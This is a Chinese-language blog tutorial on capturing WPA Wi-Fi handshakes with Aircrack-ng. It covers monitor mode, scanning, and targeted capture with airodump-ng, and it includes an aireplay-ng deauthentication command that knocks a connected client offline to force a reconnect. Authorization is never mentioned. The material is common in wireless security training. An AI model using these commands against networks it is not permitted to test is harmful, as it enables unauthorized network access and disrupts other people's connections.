Aircrack-ng抓握手包

执行命令前最好用sudo -i 切换到root权限

#1,最好使用外置无线网卡,如果使用虚拟机的,把无线网卡直通到虚拟机

#2,查看网卡是否识别,通常第一块无线网卡名称为:wlan0,以下操作以wlan0举例

ifconfig

#3,执行扫描前清除一次进程

airmon-ng check kill

#4,开启网卡监听,通常情况下,成功开启监听后"ifconfig"命令可以查看到"wlan0"会变成"wlan0mon"

airmon-ng start wlan0

#5,开始扫描WIFI

airodump-ng wlan0mon

该命令默认扫描的是2.4G频段,如果需要扫描全部频段,可以使用以下命令

airodump-ng wlan0mon -b abg

如果只需要扫描5G频段,可以使用以下命令

airodump-ng wlan0mon -b a

另外,也可以使用以下命令查看无线网卡是否支持5G

iw list

图片

这里分上下两部分内容,第一部分是扫描到的SSID(AP)列表,在ESSID列可以看到Wifi名称

第二部分是WIFI下面连接的客户端,也就是STATION,所以最佳的条件是你的目标AP下已经有已连接的客户端,便于后面抓握手包。

满足以上条件后,可以按Ctrl+C终止了,并记录以下数据:
• 目标 BSSID(AP的物理MAC)
• CH(信道)

#6,抓包

命令格式

airodump-ng --bssid <目标BSSID> -c <信道> -w <文件保存路径> <无线网卡名称>

 本案例为

airodump-ng --bssid E6:B4:2F:4E:09:82 -c 6 -w /home/kali/Desktop/crackwifi wlan0mon

 执行这个命令后,保持终端窗口不要关闭,当用户掉线以后再次连接,就会抓到握手包。出现下图Handshake即可按Ctrl+C停止。

图片

抓到的握手包的路径是刚才定义的 /home/kali/Desktop 目录下的 .cap 文件

#7 补充

通常情况下需要等到对方客户端重连才能获取握手包,我们不可能一直等着,所以可以采取主动Attack强制客户端下线诱发重连,这里注意需要另开一个终端执行命令,命令格式为

aireplay-ng -0 <Attack次数> -a <目标BSSID> -c <已连接的客户端MAC地址> <网卡名称>

本案例为

aireplay-ng -0 10 -a A4:1A:3A:05:AB:C3 -c 7E:82:9E:BE:09:A5 wlan0mon

 通常情况下,执行完这个命令后,就能有效帮助步骤6抓到握手包。

 

posted @ 2026-07-11 21:44  airoot  阅读(43)  评论(0)    收藏  举报